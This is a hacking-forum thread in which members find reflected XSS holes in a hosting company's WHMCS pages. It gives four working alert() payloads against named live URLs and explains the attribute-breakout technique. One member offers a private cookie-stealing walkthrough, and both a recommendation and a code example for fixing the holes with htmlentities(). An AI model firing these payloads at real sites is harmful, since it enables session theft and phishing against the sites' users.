
Anyone on here looking for really cheap and really good web hosting?


ghost's Avatar
0 0

Hey guys. My buddy "Romes" has had Web Hosting services for quite some time now. I usually help him on and off but I am helping him get more clients now. I am just interested in knowing if there is anyone who wants to start a good cheap site. Well the link is currently tfbgaming.biz. The site is TFB Hosting; it's just the domain we had, tfbhosting.biz was spoofed or something.


SET's Avatar

SET

Peumonoultramicroscopicsilico
0 0

Have you ever heard of IXwebhosting.com? It's what I use. For 5.95 you get:

Unlimited Domains

600 GB Web Space

1 Free Domain Registration

6,000 GB Data Transfer

Unlimited Sub Domains

I use bis plan.

Unlimited Domains

1,000 GB Web Space

2 Free Domain Regs

8,000 GB Data Transfer

Unlimited Sub Domains


Uber0n's Avatar
Member
0 0

There are quite many XSS vulnerabilities in this site :right:

http://www.tfbgaming.biz/whmcs/cart.php?a=add&domain="><script>alert(123)</script>

OR

http://www.tfbgaming.biz/whmcs/knowledgebase.php?action=search&search=wawawa%22%20onmouseover=%22javascript:alert(123)
Hover the search link in the upper right corner on this page

OR

http://www.tfbgaming.biz/whmcs/downloads.php?action=search&search=wawawa%22%20onmouseover=%22javascript:alert(123)
Hover the search link in the upper right corner on this page

OR

POST data: domain=%22+onmouseover%3D%22javascript%3Aalert%28123%29&ext=.com&code=
And hover the search box

ghost's Avatar
0 0

a good cheap site


ghost's Avatar
0 0

Wow. Well… that's nice to know. Ha. Well thanks. And if someone had this information they couldn't do much could they? XSS pisses me off. So I ignore it for now.


Uber0n's Avatar
Member
0 0

chronicburst wrote: And if someone had this information they couldn't do much could they?

Except for stealing cookies and login details and using them for editing other people's sites, adding phishing frames, keylogging users on the site using XSS Shell, defacing pages and a bunch of other harmless things, no they couldn't do much :D

Go on and ignore it, XSS never hurt anyone.


ghost's Avatar
0 0

lmao! maybe he ignores it because he can't fix it?


ghost's Avatar
0 0

No I totally agree, like the most harmful isn't XSS, so yeah, well how hard is it to fix actually.

And if you can't code your own filter google XSS filter!


What_A_Legend's Avatar
...Legend?
0 0

It's not the most harmful XSS when in a search bar… But as Uber0n stated, cookie stealing can come from it. If the site is trusted people can use phishing attacks to get people to go to the link.

I feel all XSS should be patched even if in search bar, it's not too much to patch it.


ghost's Avatar
0 0

Well as I stated earlier I never took time in to learning of the XSS yet. So if anyone here can point me into the right direction to fix these complications.


ghost's Avatar
0 0

hahah sucks for you,…..you got a vulnerability in your site and you don't know how to fix it hahahhah…..oh a couple questions about XSS then

  1. why is it you have to include "> and why doesn't it do letter?…then I tried HTML entities and that didn't work either…

Uber0n's Avatar
Member
0 0

chronicburst wrote: Well as I stated earlier I never took time in to learning of the XSS yet. So if anyone here can point me into the right direction to fix these complications.

I'd recommend using the PHP function htmlentities() on the variable before printing it ;)

cis_slayer wrote: why is it you have to include "> and why doesn't it do letter?…

Scenario: You search for DOG. In the result page you can read this:

<form method="post" action="/whmcs/cart.php?a=add&domain=DOG">

Now how to escape the form action thing? Easy!

<form method="POST" action="variable value">

so all we have to do is make it think it has reached the end of the action URL value by inserting "> and all text after it will be executed as HTML (or for example javascript…). We use for example DOG"><script>alert(123)</script> and it outputs

<form method="post" action="/whmcs/cart.php?a=add&domain=DOG"> <script>alert(123)</script> ">

So, you include "> in order to make it break out of, for example, text boxes, form actions etc. You can escape text fields by inserting </textarea> and titles by inserting </title> etc ;)
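The htmlentities() fix recommended above, set beside the unescaped output and a tags-only filter, as an added example that is not part of the original posts and is not WHMCS code. The render_* functions and attribute_intact() are hypothetical stand-ins for the template that prints the form tag; the inputs are the ones quoted in this thread.

```php
<?php
// Added example. render_* are hypothetical stand-ins for the template that
// prints <form method="post" action="/whmcs/cart.php?a=add&domain=...">.

function render_vulnerable(string $domain): string {
    // Value is printed straight into a double-quoted attribute.
    return '<form method="post" action="/whmcs/cart.php?a=add&domain=' . $domain . '">';
}

function render_tag_filter(string $domain): string {
    // Removing tags only: quotes survive, so the attribute can still be closed.
    return render_vulnerable(strip_tags($domain));
}

function render_encoded(string $domain): string {
    // 1) URL-encode the value for its place in the query string.
    // 2) HTML-encode the whole attribute value. ENT_QUOTES also covers
    //    single-quoted attributes (before PHP 8.1 the default left ' alone).
    $url = '/whmcs/cart.php?a=add&domain=' . rawurlencode($domain);
    return '<form method="post" action="'
         . htmlentities($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">';
}

// True when the output is still one <form> tag with only method and action.
function attribute_intact(string $html): bool {
    return preg_match('/^<form method="post" action="[^"<>]*">$/', $html) === 1;
}

// Inputs quoted in the thread.
$inputs = [
    'DOG',
    'DOG"><script>alert(123)</script>',
    'wawawa" onmouseover="javascript:alert(123)',
];

foreach ($inputs as $in) {
    printf("%-45s vulnerable=%s tag_filter=%s encoded=%s\n",
        $in,
        var_export(attribute_intact(render_vulnerable($in)), true),
        var_export(attribute_intact(render_tag_filter($in)), true),
        var_export(attribute_intact(render_encoded($in)), true));
}
```

The tags-only filter still lets both quoted inputs close the action attribute, which is why encoding at output is the fix rather than a blacklist of tags.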


What_A_Legend's Avatar
...Legend?
0 0

Useful reply Uber0n, maybe you should put together a nice XSS article about patching rather than XSS hacks. Be good to get some good articles going on HBH.


Uber0n's Avatar
Member
0 0

Good idea :D I'd love to write something about XSS ^^

Speaking of XSS vulnerabilities, I just found two in the web based login system for Novell Groupwise 7 xD


What_A_Legend's Avatar
...Legend?
0 0

Nice work man, you're like the XSS king around this place.


Uber0n's Avatar
Member
0 0

Haha thanks :) I guess I've gotten used to it because I almost always look for XSS on every page I visit xD my XSSed.com list has become quite long in just a few months… :happy:


ghost's Avatar
0 0

Thanks Uber0n, that's really cool….I do agree that you could write a killer XSS article.


Uber0n's Avatar
Member
0 0

Will there be a new zine or not? In that case I could write it for the zine instead :happy:


What_A_Legend's Avatar
...Legend?
0 0

The zine is happening, we got some good articles coming from Cheese, and yes Uber0n you're more than welcome to write it for the zine instead. When you've written it either email it to my hotmail on my profile or add me on MSN with that email.

Cheers man.


ghost's Avatar
0 0

Well I'm starting to think that it is time to learn XSS from all the confusion that's built up. Well not that much but I am so unfamiliar with it. Can anyone show me a demonstration of how you would get the cookies or etc from these vulnerabilities.


spyware's Avatar
Banned
0 0

You know, if you knew Javascript and PHP you wouldn't be asking this. That brings me to my next question, why don't you go learn some PHP and Javascript?


ghost's Avatar
0 0

I agree. It is time for me to go and learn some PHP. And what the hell did you do? You have 25 warn?


spyware's Avatar
Banned
0 0

<politicallyincorrect> The (white) elves did it with guns (from america). </politcallyincorrect>


Futility's Avatar
:(
80 122

spyware wrote: <politicallyincorrect> The (white) elves did it with guns (from america). </politcallyincorrect>

GO AMERICA!!

In all seriousness though. What do you have to do to get banned/warned?


spyware's Avatar
Banned
0 0

Follow my lead =]


ghost's Avatar
0 0

Hahahahah :) good answer! :evil:


Uber0n's Avatar
Member
0 0

You can PM me and I'll give you a full walkthrough of how to steal cookies from that website ;)

I might not be able to answer the PM before Saturday though, I'll be responsible for the network on a big LAN in town this weekend so I need today and tomorrow to prepare some stuff.


ghost's Avatar
0 0

All right, that sounds cool. Thanks!


ghost's Avatar
0 0

http://www.w3schools.com

Read up through there, great place to learn really all the basics you should need, from there just go to the developers' websites, forums or google the language for nice tricks


ghost's Avatar
0 0

I remember my dad telling me about w3schools. This is a really well thought up site. Well thanks for reminding me. So out of curiosity, how long have you been into graphic design? You are truly amazingly talented at it.